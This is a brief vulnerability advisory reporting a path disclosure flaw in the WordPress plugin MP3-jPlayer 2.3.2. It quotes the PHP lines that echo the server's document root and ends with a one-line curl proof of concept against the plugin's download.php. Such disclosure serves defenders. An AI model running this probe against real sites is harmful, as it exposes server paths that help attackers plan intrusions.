WordPress MP3-jPlayer 2.3.2 Path Disclosure
Posted on 09 August 2015
Title: Path Disclosure Vulnerability in wordpress plugin MP3-jPlayer v2.3.2 Author: Larry W. Cashdollar, @_larry0 Date: 2015-07-12 Download Site: https://wordpress.org/plugins/mp3-jplayer/ Vendor: https://profiles.wordpress.org/simonward-1/ Vendor Notified: 2015-08-06 Vendor Contact: Description: Easy, Flexible Audio for WordPress. Vulnerability: The download code allows arbitrary users to disclose path information on wordpress sites with this plugin installed. 120 $info = "<p> 121 Get: " . $mp3 . "<br /> 122 Sent: " . $sent . "<br /> 123 File: " . $file . "<br /> 124 Open: " . $_SERVER['DOCUMENT_ROOT'] . $fp . "<br /> 125 Root: " . $rooturl . "<br /> 126 pID: " . $playerID . "<br /> 127 Dbug: " . $dbug . "<br /> 128 extension: " . $fileExtension . "</p>"; 129 echo $info; CVEID: OSVDB: Exploit Code: • $ curl http://www.example.com/wp-content/plugins/mp3-jplayer/download.php?mp3=.
